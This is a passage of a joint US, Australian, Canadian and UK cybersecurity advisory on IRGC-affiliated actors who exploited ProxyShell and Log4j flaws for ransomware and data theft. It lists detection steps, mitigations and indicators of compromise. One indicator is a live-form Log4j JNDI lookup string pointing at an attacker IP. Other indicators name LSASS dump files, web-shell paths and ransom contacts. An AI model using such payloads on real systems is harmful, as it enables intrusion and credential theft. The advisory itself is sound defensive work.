  • In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company’s operations for an extended period.
  • In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.
  • In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company’s network.

MITRE ATT&CK® Tactics and Techniques

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See Appendix B for a table of the MITRE ATT&CK tactics and techniques observed.

The authoring agencies assess the following tactics and techniques are associated with this activity.

Resource Development [TA0042]

The IRGC-affiliated actors have used the following malicious and legitimate tools [T1588.001, T1588.002] for a variety of tactics across the enterprise spectrum:

  • Fast Reverse Proxy (FRP) for command and control (C2)
  • Plink for C2
  • Remote Desktop Protocol (RDP) for lateral movement
  • BitLocker for data encryption
  • SoftPerfect Network Scanner for system network configuration discovery

Note: For additional tools used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Initial Access [TA0001]

As stated in the Technical Details section previously reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the IRGC-affiliated actors gained initial access by exploiting known vulnerabilities [T1190].

The following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:

  • Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories:
    • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\
    • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
    • C:\inetpub\wwwroot\aspnet_client\

The following IOCs, observed as of December 2021, are indicative of Log4j vulnerability exploitation on targeted entity networks:

  • ${jndi:ldap//148.251.71.182:1389/RCE} (user agent string)
  • RCE.class

Execution [TA0002]

The IRGC-affiliated actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:

  • Wininet
  • Wininet’
  • WinLogon
  • CacheTask

Note: The potential exists that tasks associated with CacheTask or Wininet may be legitimate. For additional tasks used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Persistence [TA0003]

The IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:

  • Domain Admin
  • it_admin
  • DefaultAccount
  • Default01

Note: For additional account usernames associated with this activity, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Exfiltration [TA0010]

The authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:

  • C:\Windows\Temp\sassl[.]pmd
  • C:\Windows\Temp\ssasl[.]zip
  • C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]dmp
  • C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]zip

Impact [TA0040]

The IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [T1486] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity’s networked printer(s). The notes included the following contact information:

  • @BuySafety (Telegram)
  • @WeRBits (Telegram)
  • +93794415076 (WhatsApp)
  • werbits@onionmail[.]org
  • buysafety@onionmail[.]org
  • yacashcash@rambler[.]ru

Note: For additional contact information included in ransom notes, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

DETECTION

The authoring agencies recommend that organizations using Microsoft Exchange servers, Fortinet devices, and/or VMware Horizon applications investigate potential suspicious activity in their networks.

  • Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts.
    • Note: Refer to Appendix A for IOCs.
  • Review Log4j vulnerabilities, including CVE-2021-44228, CVE-2021-45046, and CVE-2021- 45105.
  • Review Microsoft Exchange ProxyShell vulnerabilities, including CVE-2021-34473, CVE-2021- 34523, and CVE-2021-31207.
  • As a precaution, review additional Microsoft Exchange vulnerabilities, including CVE-2021- 31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470 because the authoring agencies have seen the actors broadly target Microsoft Exchange servers.
  • Investigate exposed Microsoft Exchange servers, both patched and unpatched, for compromise.
  • Review Fortinet FortiOS vulnerabilities, including CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
  • Review VMware vulnerabilities, including any relevant vulnerabilities listed on the VMware security advisory page.
  • Investigate changes to RDP, firewall, and Windows Remote Management (WinRM) configurations that may allow malicious cyber actors to maintain persistent access.
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
  • Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system and scheduled tasks—including each step these tasks perform—for unrecognized “actions.”
  • Review antivirus logs for indications they were unexpectedly turned off.
  • Look for WinRAR and FileZilla in unexpected locations.
  • Review servers and workstations for malicious executable files masquerading as legitimate Windows processes. Malicious files may not be found in the expected directory and may have cmd.exe or powershell.exe as their parent process.

Note: For additional approaches on uncovering malicious cyber activity, see joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity, authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Mitigations

The authoring agencies urge network defenders to prepare for and mitigate potential cyber threats immediately by implementing the mitigations below.

Implement and Enforce Backup and Restoration Policies and Procedures

  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware or other destructive data incident and protect against data losses.
    • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Activate BitLocker on all networks and securely back up BitLocker keys with Microsoft and with an independent offline backup.
  • Create, maintain, and exercise a basic cyber incident response plan that includes response procedures for a ransom incident.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).

Patch and Update Systems

Evaluate and Update Blocklists and Allowlists

  • Regularly evaluate and update blocklists and allowlists.
  • If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization’s execution blocklist. Prevent any attempts to install or run this program and its associated files.

Implement Network Segmentation

  • Implement network segmentation to restrict a malicious threat actor’s lateral movement.

Secure User Accounts

  • Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties.
  • Require administrator credentials to install software.

Implement Multifactor Authentication

  • Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.

Use Strong Passwords

Secure and Monitor RDP and other Potentially Risky Services

  • If you use RDP, restrict it to limit access to resources over internal networks. After assessing risks, if your organization deems RDP operationally necessary, restrict the originating sources, and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.
  • Disable unused remote access/RDP ports.
  • Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts (to block brute force campaigns), and log RDP login attempts.

Use Antivirus Programs

  • Install and regularly update antivirus and anti-malware software on all hosts.

Secure Remote Access

  • Only use secure networks.
  • Consider installing and using a VPN for remote access.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Appendix B).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESPONDING TO RANSOMWARE OR EXTORTION INCIDENTS

If a ransomware or extortion incident occurs at your organization:

Note: The authoring agencies strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.

RESOURCES

  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
  • For more information on malicious cyber activity affiliated with the Iranian government- sponsored malicious cyber activity, see us-cert.cisa.gov/Iran and FBI’s Iran Threat page.
  • For information and resources on protecting against and responding to ransomware or extortion activity, refer to StopRansomware.gov, the U.S. centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate malicious activity.
  • ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at cyber.gov.au and via 1300 292 371 (1300 CYBER1).

PURPOSE

This advisory was developed by U.S., Australian, Canadian, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, USCC-CNMF, DoT, ACSC, CCCS, and NCSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

APPENDIX A: INDICATORS OF COMPROMISE

IP addresses and executables files are listed below. For a downloadable copy of IOCs, see AA22- 257A.stix.

IP Addresses

  • 54.39.78[.]148
  • 95.217.193[.]86
  • 104.168.117[.]149
  • 107.173.231[.]114
  • 144.76.186[.]88
  • 148.251.71[.]182
  • 172.245.26[.]118
  • 185.141.212[.]131
  • 198.12.65[.]175
  • 198.144.189[.]74

Note: Some of these observed IP addresses may be outdated. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.

Malicious Domains

  • newdesk[.]top
  • symantecserver[.]co
  • msupdate[.]us
  • msupdate[.]top
  • gupdate[.]us
  • aptmirror[.]eu
  • buylap[.]top
  • winstore[.]us
  • tcp443[.]org
  • mssync[.]one
  • upmirror[.]top
  • tcp443 (subdomain)
  • kcp53 (subdomain)

Files

Malicious files observed in this activity are identified in Table 1. Many of the below malicious files are masquerading as legitimate Windows files; therefore, file names alone should not be treated as an indicator of compromise. Note: For additional malicious files observed, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Filename:

Wininet[.]xml

Path:

C:\Windows\Temp\wininet[.]xml

MD5:

d2f4647a3749d30a35d5a8faff41765e

SHA-1:

0f676bc786db3c44cac4d2d22070fb514b4cb64c

SHA-256:

559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e

Filename:

Wininet’[.]xml

MD5:

2e1e17a443dc713f13f45a9646fc2179

SHA-1:

e75bfc0dd779d9d8ac02798b090989c2f95850dc

Filename:

WinLogon[.]xml

Path:

C:\Windows\Temp\WinLogon[.]xml

MD5:

49c71178fa212012d710f11a0e6d1a30

SHA-1:

226f0fbb80f7a061947c982ccf33ad65ac03280f

SHA-256:

bcc2e4d96e7418a85509382df6609ec9a53b3805effb7ddaed093bdaf949b6ea

Filename:

Wininet[.]bat

Path:

C:\Windows\wininet[.]bat

MD5:

5f098b55f94f5a448ca28904a57c0e58

SHA-1:

27102b416ef5df186bd8b35190c2a4cc4e2fbf37

SHA-256:

668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0

Filename:

Winlogon[.]bat

Path:

C:\Windows\winlogon[.]bat

MD5:

7ac4633bf064ebba9666581b776c548f

SHA-1:

524443dd226173d8ba458133b0a4084a172393ef

SHA-256:

d14d546070afda086a1c7166eaafd9347a15a32e6be6d5d029064bfa9ecdede7

Filename:

CacheTask[.]bat

Path:

C:\\ProgramData\Microsoft\CacheTask[.]bat

MD5:

ee8fd6c565254fe55a104e67cf33eaea

SHA-1:

24ed561a1ddbecd170acf1797723e5d3c51c2f5d

SHA-256:

c1723fcad56a7f18562d14ff7a1f030191ad61cd4c44ea2b04ad57a7eb5e2837

Filename:

Task_update[.]exe

Path:

C:\Windows\Temp\task_update[.]exe

MD5:

cacb64bdf648444e66c82f5ce61caf4b

SHA-1:

3a6431169073d61748829c31a9da29123dd61da8

SHA-256:

12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a

Filename:

Task[.]exe

MD5:

5b646edb1deb6396082b214a1d93691b

SHA-1:

763ca462b2e9821697e63aa48a1734b10d3765ee

SHA-256:

17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f

Filename:

dllhost[.]exe

Path:

C:\Windows\dllhost[.]exe

MD5:

0f8b592126cc2be0e9967d21c40806bc

9a3703f9c532ae2ec3025840fa449d4e

SHA-1:

3da45558d8098eb41ed7db5115af5a2c6 1c543af

8ece87086e8b5aba0d1cc4ec3804bf74e 0b45bee

SHA-256:

724d54971c0bba8ff32aeb6044d3b3fd57 1b13a4c19cada015ea4bcab30cae26

1604e69d17c0f26182a3e3ff65694a4945

0aafd56a7e8b21697a932409dfd81e

Filename:

svchost[.]exe

Path:

C:\Windows\svchost[.]exe

MD5:

68f58e442fba50b02130eedfc5fe4e5b

298d41f01009c6d6240bc2dc7b769205

SHA-1:

76dd6560782b13af3f44286483e157848

efc0a4e

6ca62f4244994b5fbb8a46bdfe62aa1c95 8cebbd

SHA-256:

b04b97e7431925097b3ca4841b894139 7b0b88796da512986327ff66426544ca

8aa3530540ba023fb29550643beb00c9c 29f81780056e02c5a0d02a1797b9cd9

Filename:

User[.]exe

Path:

C:\Windows\Temp\user[.]exe

MD5:

bd131ebfc44025a708575587afeebbf3

f0be699c8aafc41b25a8fc0974cc4582

SHA-1:

8b23b14d8ec4712734a5f6261aed40942 c9e0f68

6bae2d45bbd8c4b0a59ba08892692fe86 e596154

SHA-256:

b8a472f219658a28556bab4d6d109fdf3 433b5233a765084c70214c973becbbd

7b5fbbd90eab5bee6f3c25aa3c2762104 e219f96501ad6a4463e25e6001eb00b

Filename:

Setup[.]bat

Path:

C:\Users\DefaultAccount\Desktop\New folder\setup[.]bat

MD5:

7fdc2d007ef0c1946f1f637b87f81590

Filename:

Ssasl[.]pmd

Path:

C:\Windows\Temp\ssasl[.]pmd

Filename:

Ssasl[.]zip

Path:

C:\Windows\Temp\ssasl[.]zip

Filename:

netscanold[.]exe

Path:

C:\Users\DefaultAccount\Desktop\netscanold\netscanold[.]exe

Filename:

scan[.]csv

Path:

C:\Users\DefaultAccount\Desktop\scan[.]csv

Filename:

lsass[.]dmp

Path:

C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]dmp

Filename:

lsass[.]zip

Path:

C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]zip

 

APPENDIX B: MITRE ATT&CK TACTICS AND TECHNIQUES

Table 2 identifies MITRE ATT&CK Tactics and techniques observed in this activity.

 

Revisions

September 14, 2022: Initial Version

Source…